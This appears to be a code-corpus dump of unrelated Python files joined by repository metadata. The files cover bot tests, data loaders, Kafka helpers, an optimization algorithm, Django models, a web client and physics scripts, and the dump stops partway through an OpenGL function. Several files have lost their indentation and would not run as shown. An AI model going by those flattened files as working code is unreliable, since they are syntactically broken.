from aiogram import Bot
from .dataset import CustomSysInfo, UptimeTimer
from app.misc import colorize
from app.utils.bot_info import format_sys_info, calc_ping, get_uptime
def _set_ms(td: timedelta, correct_value: float) -> timedelta:
td_diff = timedelta(microseconds=correct_value - td.microseconds)
return td + td_diff
class TestBotInfo(unittest.TestCase):
    """Unit tests for app.utils.bot_info helpers and the colorize module."""

    def test_sys_info(self):
        self.assertEqual(format_sys_info(), str(CustomSysInfo()))

    def test_calc_ping(self):
        # calc_ping's arguments are timestamps; the result is in milliseconds.
        self.assertEqual(calc_ping(time(), time()), 0)
        self.assertEqual(calc_ping(time() - 1, time()), 1000)
        self.assertEqual(calc_ping(time(), time() + 0.53), 0.53 * 1000)
        self.assertEqual(calc_ping(time() - 0.18, time()), 0.18 * 1000)
        self.assertEqual(calc_ping(1923.80, 1924.20), 400)

    def test_get_uptime(self):
        # days, seconds, microseconds, milliseconds, minutes, hours, weeks
        bot = Bot(token="<PASSWORD>:<PASSWORD>", validate_token=False)
        periods = [
            UptimeTimer(seconds=5), UptimeTimer(seconds=3, microseconds=56), UptimeTimer(seconds=0),
            UptimeTimer(days=10, hours=3, minutes=4, seconds=56, microseconds=132)
        ]
        for period in periods:
            bot['start_time'] = period.start_time
            _time_format = "%Y-%m-%d %H.%M.%S"
            # Microseconds are normalised via _set_ms before comparing uptimes.
            self.assertEqual(_set_ms(get_uptime(bot=bot), period.uptime.microseconds), period.uptime)
            start, _, uptime = get_uptime(True, bot)
            self.assertEqual(start.strftime(_time_format), period.start_time.strftime(_time_format))
            self.assertEqual(_set_ms(uptime, period.uptime.microseconds), period.uptime)

    def test_colorize(self):
        self.assertEqual("\u001b[1;34m blue \u001b[0m", colorize.blue('blue'))
        self.assertEqual("\u001b[31;1m red \u001b[0m", colorize.red('red'))
        self.assertEqual("\u001b[32;1m green \u001b[0m", colorize.green('green'))
        self.assertEqual("\u001b[33;1m yellow \u001b[0m", colorize.yellow('yellow'))
        self.assertEqual("\u001b[36m cyan \u001b[0m", colorize.cyan('cyan'))
        # The --no_color flag must disable all ANSI escape codes.
        sys.argv.append("--no_color")
        self.assertEqual("text", colorize.red("text"))
        sys.argv.remove("--no_color")
if __name__ == '__main__':
unittest.main()
| 2.53125 | 3 |
dependencynet/core/datasource/levelsloader.py | cfalguiere/dependencynet | 0 | 12772864 | <reponame>cfalguiere/dependencynet<filename>dependencynet/core/datasource/levelsloader.py
"""
This module provides helpers to extract levels from source data
"""
import logging
import pandas as pd
class LevelsLoader:
logger = logging.getLogger(__name__)
@classmethod
def __init__(self, schema, source_df):
self.schema = schema
self.source_df = source_df
@classmethod
def extract_all(self):
dfs = []
self.logger.debug('extract_hierarchy schema=%s', self.schema)
keys = self.schema.levels_keys()
marks = self.schema.levels_marks()
pattern = '%s{id:02d}' % marks[0]
df_parent = self.__extract_items_root(self.source_df, [keys[0]], pattern)
dfs.append(df_parent)
for i in range(1, len(keys)):
df_i = self.__extract_items_non_root(self.source_df,
keys[0:i+1],
'{id_parent}%s{id:02d}' % marks[i],
df_parent)
dfs.append(df_i)
df_parent = df_i
return dfs
@classmethod
def __extract_items_root(self, df, keys, id_pattern):
self.logger.debug('extract_items_root keys=%s id_pattern=%s', keys, id_pattern)
id_key = keys[-1]
pos_key = 'pos'
self.logger.debug('extract_items_root id_key=%s', id_key)
items_df = df.drop_duplicates(subset=keys)[keys]
def get_pos():
i = 0
while i < len(items_df.index):
yield i
i += 1
items_df[pos_key] = pd.DataFrame(list(get_pos()), index=items_df.index)
items_df[pos_key] = items_df[pos_key] + 1
def format_id(p):
id = id_pattern.format(id=p)
return id
items_df['id'] = items_df[pos_key].apply(lambda x: format_id(x))
items_df['label'] = items_df.apply(lambda row: "%s %s" % (row['id'], row[id_key]), axis=1)
self.logger.info('extract_items_root keys=%s id_pattern=%s => shape=%s', keys, id_pattern, items_df.shape)
return items_df
@classmethod
def __extract_items_non_root(self, df, keys, id_pattern, parent_df):
self.logger.debug('extract_items_non_root keys=%s id_pattern=%s', keys, id_pattern)
id_key = keys[-1]
parent_keys = keys[0:-1]
self.logger.debug('extract_items_non_root id_key=%s', id_key)
pos_key = 'pos'
items_df = df.drop_duplicates(subset=keys)[keys]
items_df[pos_key] = items_df.groupby(parent_keys).cumcount()
items_df[pos_key] = items_df[pos_key] + 1
# enrich with parent id
items_df = pd.merge(items_df, parent_df[parent_keys + ['id']], on=parent_keys)
columns_mapping = {
'id': 'id_parent'
}
items_df = items_df.rename(columns=columns_mapping)
items_df['id'] = items_df.apply(
lambda row: id_pattern.format(id=row[pos_key], id_parent=row['id_parent']),
axis=1)
items_df['label'] = items_df.apply(lambda row: "%s %s" % (row['id'], row[id_key]), axis=1)
self.logger.info('extract_items_root keys=%s id_pattern=%s => shape=%s', keys, id_pattern, items_df.shape)
return items_df
| 2.375 | 2 |
data_pipeline/testing_helpers/kafka_docker.py | poros/data_pipeline | 110 | 12772865 | # -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
from contextlib import contextmanager
from kafka import KafkaClient
from kafka import SimpleConsumer
from data_pipeline.config import get_config
from data_pipeline.message import create_from_offset_and_message
# Maximum internal buffer size (in bytes) handed to SimpleConsumer below.
_ONE_MEGABYTE = 1024 * 1024

# Module-level logger sourced from the shared data_pipeline configuration.
logger = get_config().logger
@contextmanager
def capture_new_data_pipeline_messages(topic):
    """Context manager that tails *topic* and yields a retrieval function.

    On entry the consumer is positioned at the tail of the topic, so only
    messages produced afterwards are visible.  The yielded callable takes
    an optional ``count`` (default 100) and returns up to that many decoded
    data pipeline messages; it never blocks and simply returns whatever is
    immediately available.

    Returns:
        Callable[[int], List[Message]]: non-blocking fetcher of decoded
        data pipeline messages.
    """
    with capture_new_messages(topic) as get_kafka_messages:
        def get_data_pipeline_messages(count=100):
            decoded = []
            for raw_message in get_kafka_messages(count):
                decoded.append(create_from_offset_and_message(raw_message))
            return decoded

        yield get_data_pipeline_messages
@contextmanager
def capture_new_messages(topic):
    """Seek to the tail of *topic*, then yield a raw-message fetcher.

    The yielded callable accepts an optional ``count`` (default 100) and
    returns up to that many raw Kafka messages without blocking.
    """
    with setup_capture_new_messages_consumer(topic) as consumer:
        yield lambda count=100: consumer.get_messages(count=count)
@contextmanager
def setup_capture_new_messages_consumer(topic):
    """Yield a SimpleConsumer positioned at the tail of *topic*.

    The Kafka client connection is always closed on exit.

    BUG FIX: the original called ``kafka.close()`` only after the ``yield``
    returned normally, so an exception raised inside the ``with`` body
    leaked the client connection.  Cleanup now runs in a ``finally`` block.
    """
    kafka = KafkaClient(get_config().cluster_config.broker_list)
    group = str('data_pipeline_clientlib_test')
    consumer = SimpleConsumer(kafka, group, topic, max_buffer_size=_ONE_MEGABYTE)
    consumer.seek(0, 2)  # seek to tail, 0 is the offset, and 2 is the tail
    try:
        yield consumer
    finally:
        kafka.close()
| 2.25 | 2 |
src/neqsim/neqsimpython.py | equinor/neqsimpython | 20 | 12772866 | import jpype
# Register the NeqSim jar on the JVM classpath, then start the JVM once.
# addClassPath must happen before startJVM for the jar to be visible.
jpype.addClassPath('./lib/NeqSim.jar')
if not jpype.isJVMStarted():
    jpype.startJVM(convertStrings=True)
# Top-level handle to the Java 'neqsim' package.
neqsim = jpype.JPackage('neqsim')
LWOA.py | ZongSingHuang/L-vy-Whale-Optimization-Algorithm | 4 | 12772867 | <reponame>ZongSingHuang/L-vy-Whale-Optimization-Algorithm
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 16 21:59:58 2020
@author: ZongSing_NB
https://doi.org/10.1109/ACCESS.2017.2695498
"""
import math
import numpy as np
import matplotlib.pyplot as plt
class LWOA():
    """Lévy-flight Whale Optimization Algorithm (LWOA) for minimization.

    Standard WOA moves (encircling prey, bubble-net spiral, random search)
    plus a Lévy-flight perturbation of every whale each generation.
    Reference: https://doi.org/10.1109/ACCESS.2017.2695498
    """

    def __init__(self, fitness, D=30, P=20, G=500, ub=1, lb=0,
                 b=1, a_max=2, a_min=0, a2_max=-1, a2_min=-2, l_max=1, l_min=-1):
        """Configure the optimizer.

        :param fitness: callable mapping a (P, D) position matrix to a
            length-P array of objective values (lower is better).
        :param D: number of decision variables.
        :param P: population size (number of whales).
        :param G: number of generations.
        :param ub: scalar upper bound, broadcast to every dimension.
        :param lb: scalar lower bound, broadcast to every dimension.
        :param b: logarithmic-spiral shape constant of the bubble-net move.
        :param a_max: initial value of the linearly decaying coefficient a.
        :param a_min: final value of the linearly decaying coefficient a.
        :param a2_max: initial value of the spiral-parameter schedule.
        :param a2_min: final value of the spiral-parameter schedule.
        :param l_max: retained for interface compatibility (unused; l is
            drawn from the a2 schedule instead).
        :param l_min: retained for interface compatibility (unused).
        """
        self.fitness = fitness
        self.D = D
        self.P = P
        self.G = G
        self.ub = ub*np.ones([self.P, self.D])
        self.lb = lb*np.ones([self.P, self.D])
        self.a_max = a_max
        self.a_min = a_min
        self.a2_max = a2_max
        self.a2_min = a2_min
        self.l_max = l_max
        self.l_min = l_min
        self.b = b

        # Best solution found so far and its fitness.
        self.gbest_X = np.zeros([self.D])
        self.gbest_F = np.inf
        # Best fitness recorded at each generation.
        self.loss_curve = np.zeros(self.G)

    def opt(self):
        """Run the optimization.

        Results are stored on the instance: ``gbest_X`` (best position),
        ``gbest_F`` (best fitness) and ``loss_curve`` (per-generation best).
        """
        # Initialize the population uniformly inside the bounds.
        self.X = np.random.uniform(low=self.lb, high=self.ub, size=[self.P, self.D])

        for g in range(self.G):
            # Evaluate all whales at once.
            F = self.fitness(self.X)

            # Update the global best.
            if np.min(F) < self.gbest_F:
                idx = F.argmin()
                self.gbest_X = self.X[idx].copy()
                self.gbest_F = F.min()

            # Convergence history.
            self.loss_curve[g] = self.gbest_F

            # Linearly decaying control parameters.
            a = self.a_max - (self.a_max-self.a_min)*(g/self.G)
            a2 = self.a2_max - (self.a2_max-self.a2_min)*(g/self.G)

            for i in range(self.P):
                p = np.random.uniform()
                r1 = np.random.uniform()
                r2 = np.random.uniform()
                r3 = np.random.uniform()
                A = 2*a*r1 - a  # (2.3)
                C = 2*r2  # (2.4)
                l = (a2-1)*r3 + 1

                if p > 0.5:
                    # Bubble-net spiral around the best whale (6).
                    dist = np.abs(self.gbest_X - self.X[i, :])
                    self.X[i, :] = dist*np.exp(self.b*l)*np.cos(2*np.pi*l) + self.gbest_X
                else:
                    if np.abs(A) < 1:
                        # Encircling the best whale (2).
                        dist = np.abs(C*self.gbest_X - self.X[i, :])
                        self.X[i, :] = self.gbest_X - A*dist
                    else:
                        # Exploration around a random whale (9): one random
                        # row index per dimension; np.diag then picks one
                        # component from each selected row.
                        X_rand = self.X[np.random.randint(low=0, high=self.P, size=self.D), :]
                        X_rand = np.diag(X_rand).copy()
                        dist = np.abs(C*X_rand - self.X[i, :])
                        self.X[i, :] = X_rand - A*dist

            # Lévy-flight perturbation of every whale.
            for i in range(self.P):
                u = np.random.uniform()
                r4 = np.random.uniform()
                self.X[i, :] = self.X[i, :] + u*np.sign(r4-0.5)*self.Levyflight()

            # Clamp back into the search bounds.
            self.X = np.clip(self.X, self.lb, self.ub)

    def plot_curve(self):
        """Plot the convergence (best-fitness-per-generation) curve.

        BUG FIX: the original referenced ``self.gBest_curve``, an attribute
        that is never created (the history lives in ``self.loss_curve``),
        so calling this method always raised AttributeError.
        """
        plt.figure()
        plt.title('loss curve ['+str(round(self.loss_curve[-1], 3))+']')
        plt.plot(self.loss_curve, label='loss')
        plt.grid()
        plt.legend()
        plt.show()

    def Levyflight(self):
        """Draw one step length from a Lévy-stable distribution.

        Uses Mantegna's algorithm: s = u / |v|**(1/beta) with
        sigma_u = ( G(1+b)*sin(pi*b/2) / (G((1+b)/2)*b*2**((b-1)/2)) )**(1/b).

        BUG FIX: the original divided by beta*Gamma(1+beta)/2 instead of
        Gamma((1+beta)/2)*beta and raised the ratio to the power 2/beta
        instead of 1/beta, which does not match Mantegna's formula.
        """
        beta = 1.5
        num = math.gamma(1 + beta) * math.sin(math.pi * beta / 2)
        den = math.gamma((1 + beta) / 2) * beta * 2 ** ((beta - 1) / 2)
        sigma_u = (num / den) ** (1 / beta)
        u = np.random.normal(0, sigma_u)
        v = np.random.normal(0, 1.0)  # sigma_v = 1 (12)
        return u / (np.abs(v) ** (1 / beta))
| 2.328125 | 2 |
sales/migrations/0001_initial.py | GeekGuste/ecommerce-nuxtjs-djoser | 0 | 12772868 | # Generated by Django 4.0.1 on 2022-05-09 17:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial schema for the ``sales`` app.

    NOTE(review): generated by ``makemigrations`` (Django 4.0.1 header
    above); do not edit in place — create a follow-up migration instead.
    """

    # First migration of this app.
    initial = True

    # The (swappable) user model must exist before Order/DeliveryAddress
    # can reference it via ForeignKey.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Self-referential category tree: 'parent' -> reverse name 'enfants'.
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('label', models.CharField(max_length=200)),
                ('is_active', models.BooleanField()),
                ('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='enfants', to='sales.category')),
            ],
        ),
        # Shipping cost per delivery zone.
        migrations.CreateModel(
            name='DeliveryZoneInfo',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('zone', models.CharField(max_length=100)),
                ('delivery_charges', models.DecimalField(decimal_places=2, max_digits=15)),
            ],
        ),
        # Products; a product may be a variant of another product
        # (self-reference 'parent' -> reverse name 'variants').
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('label', models.CharField(max_length=200)),
                ('description', models.TextField()),
                ('qte_stock', models.IntegerField(default=100)),
                ('principal_image', models.ImageField(null=True, upload_to='products')),
                ('is_variant', models.BooleanField(default=False)),
                ('variant_value', models.CharField(blank=True, max_length=200, null=True)),
                ('price', models.CharField(max_length=50)),
                ('promo_price', models.CharField(blank=True, max_length=50)),
                ('is_active', models.BooleanField(default=True)),
                ('pub_date', models.DateTimeField(auto_now=True)),
                ('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.category')),
                ('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='variants', to='sales.product')),
            ],
        ),
        migrations.CreateModel(
            name='Tags',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('label', models.CharField(max_length=100)),
            ],
        ),
        # Kind of variation a product can have (e.g. size, color).
        migrations.CreateModel(
            name='VariantType',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('label', models.CharField(max_length=100)),
            ],
        ),
        migrations.CreateModel(
            name='Video',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('file', models.FileField(upload_to='products_video')),
                ('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='videos', to='sales.product')),
            ],
        ),
        # Added after Product creation because VariantType is declared later.
        migrations.AddField(
            model_name='product',
            name='variant_type',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='sales.varianttype'),
        ),
        # Customer orders, tied to the auth user model.
        migrations.CreateModel(
            name='Order',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('order_date', models.DateTimeField(auto_now=True)),
                ('total', models.DecimalField(decimal_places=2, max_digits=15)),
                ('country', models.CharField(max_length=100)),
                ('last_name', models.CharField(max_length=100)),
                ('first_name', models.CharField(max_length=100)),
                ('address', models.CharField(max_length=255)),
                ('phone_number', models.CharField(max_length=100)),
                ('town', models.CharField(max_length=100)),
                ('delivery_charges', models.DecimalField(decimal_places=2, max_digits=15)),
                ('postal_code', models.CharField(max_length=20, null=True)),
                ('creation_date', models.DateTimeField(auto_now_add=True)),
                ('payment_date', models.DateTimeField(null=True)),
                ('is_paid', models.BooleanField(default=False)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Image',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('photo', models.ImageField(upload_to='products')),
                ('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images', to='sales.product')),
            ],
        ),
        # Saved delivery addresses per user.
        migrations.CreateModel(
            name='DeliveryAddress',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('country', models.CharField(max_length=100)),
                ('address', models.CharField(max_length=255)),
                ('phone_number', models.CharField(max_length=100)),
                ('town', models.CharField(max_length=100)),
                ('postal_code', models.CharField(max_length=20)),
                ('additional_informations', models.TextField()),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| 1.679688 | 2 |
tests/test_hello.py | smheidrich/lovely-pytest-docker | 1 | 12772869 | <reponame>smheidrich/lovely-pytest-docker
from urllib.request import urlopen
def test_hello_world(docker_hello_world):
    """Check that the hello-world container serves the expected page.

    Requesting the docker_hello_world fixture starts the container on test
    startup; we then fetch its page and look for the expected title.
    """
    body = urlopen(docker_hello_world).read()
    assert b'<title>HTTP Hello World</title>' in body
def test_single_container(docker_hello_world, docker_services):
    """Only the requested containers are started.

    The hello2 container must never start because its fixture is not used.
    """
    compose_output = docker_services._docker_compose.execute("ps")
    assert 'hello' in compose_output
    assert 'hello2' not in compose_output
def test_exec(docker_services):
    """The exec helper runs a command inside a running container."""
    listing = docker_services.exec('hello', 'ls', '-a')
    assert listing == '.\n..\nindex.html\n'
# Number of times custom_checker has reported "not ready".
custom_checker_called = 0


def custom_checker(ip_address, port):
    """Fake readiness probe: fail twice, then report ready forever."""
    global custom_checker_called
    ready = custom_checker_called > 1
    if not ready:
        custom_checker_called += 1
    return ready
def test_custom_checker(docker_services):
    """wait_for_service keeps polling a user-supplied readiness checker."""
    docker_services.wait_for_service("hello", 80, check_server=custom_checker)
    # The checker reports ready only after being called more than once.
    assert custom_checker_called > 1
| 2.703125 | 3 |
portfolio/models.py | macmohan26/EagleFinancialServices | 0 | 12772870 | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from yahoo_finance import Share
class Customer(models.Model):
    """A client of the practice, with contact details and audit timestamps."""

    name = models.CharField(max_length=50)
    address = models.CharField(max_length=200)
    # Internal customer number; also the string representation below.
    cust_number = models.IntegerField(blank=False, null=False)
    city = models.CharField(max_length=50)
    state = models.CharField(max_length=50)
    zipcode = models.CharField(max_length=10)
    email = models.EmailField(max_length=200)
    cell_phone = models.CharField(max_length=50)
    created_date = models.DateTimeField(
        default=timezone.now)
    # NOTE(review): auto_now_add sets this only once, at row creation; for a
    # "last updated" timestamp auto_now=True was probably intended — confirm
    # before relying on this field (the updated() helper below works around it).
    updated_date = models.DateTimeField(auto_now_add=True)

    def created(self):
        """Stamp created_date with the current time and persist."""
        self.created_date = timezone.now()
        self.save()

    def updated(self):
        """Stamp updated_date with the current time and persist."""
        self.updated_date = timezone.now()
        self.save()

    def __str__(self):
        # Customers are displayed by their customer number.
        return str(self.cust_number)
class Investment(models.Model):
    """A non-stock investment held by a customer, with acquired/current value."""

    customer = models.ForeignKey(Customer, related_name='investments')
    category = models.CharField(max_length=50)
    description = models.CharField(max_length=200)
    acquired_value = models.DecimalField(max_digits=10, decimal_places=2)
    acquired_date = models.DateField(default=timezone.now)
    recent_value = models.DecimalField(max_digits=10, decimal_places=2)
    recent_date = models.DateField(default=timezone.now, blank=True, null=True)

    def created(self):
        """Stamp acquired_date with the current time and persist."""
        self.acquired_date = timezone.now()
        self.save()

    def updated(self):
        """Stamp recent_date with the current time and persist."""
        self.recent_date = timezone.now()
        self.save()

    def __str__(self):
        # Displayed by owning customer (i.e. the customer's cust_number).
        return str(self.customer)

    def results_by_investment(self):
        """Return the gain/loss: current value minus acquisition value."""
        return self.recent_value - self.acquired_value
class Stock(models.Model):
    """A stock position held by a customer, valued via the yahoo_finance API.

    NOTE(review): the yahoo_finance package queries a retired Yahoo API;
    Share(...).get_open() may return None or fail entirely — verify before
    relying on the current_* methods.
    """

    customer = models.ForeignKey(Customer, related_name='stocks')
    symbol = models.CharField(max_length=10)
    name = models.CharField(max_length=50)
    shares = models.DecimalField(max_digits=10, decimal_places=2)
    share_value = models.DecimalField (max_digits=10, decimal_places=2)
    purchase_price = models.DecimalField(max_digits=10, decimal_places=2)
    purchase_date = models.DateField(default=timezone.now)

    def created(self):
        # NOTE(review): sets recent_date, a field this model does not declare
        # — looks copied from Investment; confirm intent.
        self.recent_date = timezone.now()
        self.save()

    def __str__(self):
        # Displayed by owning customer (i.e. the customer's cust_number).
        return str(self.customer)

    def initial_stock_value(self):
        """Return the purchase cost of the position (shares * purchase price)."""
        return self.shares * self.purchase_price

    def current_stock_price(self):
        """Return today's opening price for the symbol (as given by the API)."""
        symbol_f = self.symbol
        data = Share(symbol_f)
        share_value = (data.get_open())
        return share_value

    def current_stock_value(self):
        """Return the market value of the position.

        NOTE(review): returns a formatted string on success but a float
        (the share count) when no price is available — callers must handle
        both shapes.
        """
        symbol_f = self.symbol
        data = Share(symbol_f)
        share_value = (data.get_open())
        if share_value is None:
            return float(self.shares)
        else:
            return '{0:.2f}'.format(float(share_value) * float(self.shares))
| 2.4375 | 2 |
scrapy_do/client/webclient.py | umairwaheed/scrapy-do | 64 | 12772871 | #-------------------------------------------------------------------------------
# Author: <NAME> <<EMAIL>>
# Date: 22.01.2018
#
# Licensed under the 3-Clause BSD License, see the LICENSE file for details.
#-------------------------------------------------------------------------------
import requests
import urllib3
from scrapy_do.client import ClientException
from requests.auth import HTTPDigestAuth
#-------------------------------------------------------------------------------
def request(method, url, payload=None, auth=None, ssl_verify=True):
    """
    Send a request to the server and retrieve the response.

    :param method: request method ('POST' or 'GET')
    :param url: url to be queried
    :param payload: parameters of the request (defaults to no
                                               parameters)
    :param auth: tuple containing the authorization
                                               information
    :param ssl_verify: SSL verification flag
    :raises scrapy_do.client.ClientException: an error
    :return: parsed JSON response of the server
                                               or raw data
    """
    assert method == 'POST' or method == 'GET'

    # BUG FIX: the original used the mutable default ``payload={}``, which
    # is shared across calls; use None and build a fresh dict per call.
    if payload is None:
        payload = {}

    if not ssl_verify:
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    if auth is not None:
        auth = HTTPDigestAuth(*auth)

    try:
        if method == 'POST':
            r = requests.post(url, data=payload, auth=auth, verify=ssl_verify)
        else:
            r = requests.get(url, params=payload, auth=auth, verify=ssl_verify)
    except Exception as e:
        raise ClientException(str(e))

    # ROBUSTNESS: tolerate a missing Content-Type header and charset
    # suffixes such as 'application/json; charset=utf-8' (the original
    # raised KeyError / mis-detected JSON in those cases).
    is_json = r.headers.get('Content-Type', '').startswith('application/json')
    if is_json:
        data = r.json()
    else:
        data = r.text

    if r.status_code != 200:
        if is_json:
            raise ClientException(data['msg'])
        else:
            raise ClientException(data)
    return data
| 2.609375 | 3 |
scripts/SolCalc/calculate_PS_rot_single_region.py | FMS-Mu2e/helicalc | 0 | 12772872 | <reponame>FMS-Mu2e/helicalc<gh_stars>0
import sys
from time import time
from datetime import datetime
import argparse
import numpy as np
from helicalc import helicalc_dir, helicalc_data
from helicalc.solcalc import *
from helicalc.geometry import read_solenoid_geom_combined
from helicalc.tools import generate_cartesian_grid_df
from helicalc.constants import (
PS_grid,
TSu_grid,
TSd_grid,
DS_grid,
PStoDumpArea_grid,
ProtonDumpArea_grid
)
# Geometry parameter files live under the helicalc repo.
# paramdir = '/home/ckampa/coding/helicalc/dev/params/'
paramdir = helicalc_dir + 'dev/params/'
# Configuration selection: exactly one (paramname, datadir, base_coils)
# triple is active; the commented alternatives are previous runs kept for
# reference.
# old version
#paramname = 'Mu2e_PS3_rot_16mrad'
#paramname = 'Mu2e_PS23_rot_16mrad'
# all 3
# individual rotations
# paramname = 'Mu2e_PS123_rot_16mrad'
# datadir = helicalc_data+'Bmaps/SolCalc_partial/PS3_rot_16mrad/'
# base_coils = 'PS3_16mrad'
# rotate coldmass
# 16mrad
# paramname = 'Mu2e_PS_coldmass_rot_16mrad'
# datadir = helicalc_data+'Bmaps/SolCalc_partial/PS_coldmass_rot_16mrad/'
# base_coils = 'PS_coldmass_16mrad'
# 23mrad
# paramname = 'Mu2e_PS_coldmass_rot_23mrad'
# datadir = helicalc_data+'Bmaps/SolCalc_partial/PS_coldmass_rot_23mrad/'
# base_coils = 'PS_coldmass_23mrad'
# 7mrad
paramname = 'Mu2e_PS_coldmass_rot_7mrad'
datadir = helicalc_data+'Bmaps/SolCalc_partial/PS_coldmass_rot_7mrad/'
base_coils = 'PS_coldmass_7mrad'

# Map region name (CLI argument) to its precomputed grid definition.
regions = {'PS': PS_grid, 'TSu': TSu_grid, 'TSd': TSd_grid, 'DS': DS_grid,
           'PStoDumpArea': PStoDumpArea_grid,
           'ProtonDumpArea': ProtonDumpArea_grid}

if __name__=='__main__':
    # parse command line arguments
    parser = argparse.ArgumentParser()
    parser.add_argument('-r', '--Region',
                        help='Which region of Mu2e to calculate? '+
                        '["PS"(default), "TSu", "TSd", "DS", "PStoDumpArea"'+
                        ', "ProtonDumpArea"]')
    parser.add_argument('-c', '--Coils',
                        help='Which coils to calculate? '+
                        '["1,2,3" (default), "1,2", "1,3", "2,3", 1", "2", "3"]')
    # parser.add_argument('-t', '--Testing',
    #                     help='Calculate using small subset of coils?'+
    #                     '"y"(default)/"n"')
    args = parser.parse_args()
    # fill defaults where needed
    if args.Region is None:
        args.Region = 'PS'
    else:
        args.Region = args.Region.strip()
    if args.Coils is None:
        args.Coils = '1,2,3'
    else:
        args.Coils = args.Coils.strip()
    # if args.Testing is None:
    #     args.Testing = 'n'
    # else:
    #     args.Testing = args.Testing.strip()
    reg = args.Region
    coils = [int(i) for i in args.Coils.split(',')]
    # print configs
    print(f'Region: {reg}')
    # print(f'Testing on subset of coils? {args.Testing}\n')
    # redirect stdout to log file; progress messages keep going to the
    # original stdout via old_stdout.
    dt = datetime.strftime(datetime.now(), '%Y-%m-%d_%H%M%S')
    log_file = open(datadir+f"logs/{dt}_calculate_{reg}_region.log", "w")
    old_stdout = sys.stdout
    sys.stdout = log_file
    # print configs in file
    # print(f'Region: {reg}')
    # print(f'Testing on subset of coils? {args.Testing}\n')
    # step size for integrator (radial, longitudinal)
    drz = np.array([5e-3, 1e-2])
    # create grid
    df = generate_cartesian_grid_df(regions[reg])
    # define base save name
    base_name = f'Mau13.SolCalc.{reg}_region.{base_coils}'
    # load geometry
    geom_df_mu2e = read_solenoid_geom_combined(paramdir,paramname)
    # which coils
    #if args.Coils != '2-3':
    #    geom_df_mu2e = geom_df_mu2e.query(f'Coil_Num == {args.Coils}')
    geom_df_mu2e = geom_df_mu2e[np.isin(geom_df_mu2e.Coil_Num, coils)]
    print(f'{len(geom_df_mu2e)} Coils to Calculate', file=old_stdout)
    # TESTING (only a few coils)
    # if args.Testing == 'y':
    #     geom_df_mu2e = geom_df_mu2e.iloc[5:8]
    # loop through all coils, accumulating field contributions into df and
    # saving each coil's partial result separately
    N_coils = len(geom_df_mu2e)
    for i in range(N_coils):
    # for geom in geom_df_mu2e.itertuples():
        j = int(round(geom_df_mu2e.iloc[i].Coil_Num))
        # print coil number to screen for reference
        print(f'Calculating coil {i+1}/'+f'{N_coils}', file=old_stdout)
        # instantiate integrator
        mySolCalc = SolCalcIntegrator(geom_df_mu2e.iloc[i], drz=drz)
        # integrate on grid (and update the grid df)
        df = mySolCalc.integrate_grid(df)
        # save single coil results
        mySolCalc.save_grid_calc(savetype='pkl',
                                 savename=datadir+base_name+f'.coil_{j}',
                                 all_solcalc_cols=False)
    # save df with all coils
    # i0 = int(round(geom_df_mu2e.iloc[0].Coil_Num))
    # i1 = int(round(geom_df_mu2e.iloc[-1].Coil_Num))
    # mySolCalc.save_grid_calc(savetype='pkl',
    #                          savename=datadir+base_name+f'.coils_{i0}-{i1}',
    #                          all_solcalc_cols=True)
    # close log file
    log_file.close()
| 1.804688 | 2 |
ref/v1.1/opengl_test.py | vt-rocksat-2017/dashboard | 1 | 12772873 | #!/usr/bin/env python
from OpenGL.GLUT import *
from OpenGL.GLU import *
from OpenGL.GL import *
import sys
# Window title used by glutCreateWindow below.
name = 'ball_glut'

def main():
    """Set up a GLUT window, lighting and camera, then enter the GL loop.

    Call order matters: GLUT must be initialized before window creation,
    and GL state (depth test, lighting) before registering the display
    callback. glutMainLoop never returns.
    """
    glutInit(sys.argv)
    glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGB | GLUT_DEPTH)
    glutInitWindowSize(400,400)
    glutCreateWindow(name)
    glClearColor(0.,0.,0.,1.)
    glShadeModel(GL_SMOOTH)
    glEnable(GL_CULL_FACE)
    glEnable(GL_DEPTH_TEST)
    glEnable(GL_LIGHTING)
    # Single point light with slight attenuation.
    lightZeroPosition = [10.,4.,10.,1.]
